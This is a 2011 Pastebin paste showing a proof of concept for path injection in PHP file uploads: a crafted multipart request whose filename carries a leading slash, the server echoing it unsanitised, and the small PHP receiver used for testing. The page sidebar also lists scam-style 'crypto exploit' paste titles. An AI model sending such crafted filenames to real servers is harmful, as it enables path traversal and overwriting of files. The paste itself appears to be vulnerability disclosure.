php.net file upload path injection

a guest

May 27th, 2011

11,939

Never

Add comment

Not a member of Pastebin yet? Sign Up, it unlocks many cool features!

text 0.80 KB | None | 0 0

raw download clone embed print report

HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200
------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain
any
------------ThIs_Is_tHe_bouNdaRY_$--
HTTP Response:
====
HTTP/1.1 200 OK
Date: 2011年5月27日 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html
/anything.here.slash-will-pass
PHP script:
=====
<?php
if (!empty($_FILES['contents'])) { // process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}

Add Comment

Please, Sign In to add comment

Public Pastes

⭐⭐ Trading exploit ⭐⭐
JavaScript | 13 sec ago | 0.67 KB
🚀🚀 Insane Swap Exploit
JavaScript | 1 min ago | 0.67 KB
📌📌📌 Insane Paid BTC Exploit 📌💵
JavaScript | 1 min ago | 0.67 KB
⭐⭐ Crypto Swap Glitch ✅ Easy money 💸💰
JavaScript | 3 min ago | 0.67 KB
⭐⭐ FREE BTC GUIDE ✅ Working ⭐⭐
JavaScript | 3 min ago | 0.67 KB
Infinite Money Glitch
JavaScript | 4 min ago | 0.67 KB
🚀 Earn Money for FREE
JavaScript | 4 min ago | 0.67 KB
🔥🔥 +100,000$ in 1 month ✅💰
JavaScript | 5 min ago | 0.67 KB

We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand

Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!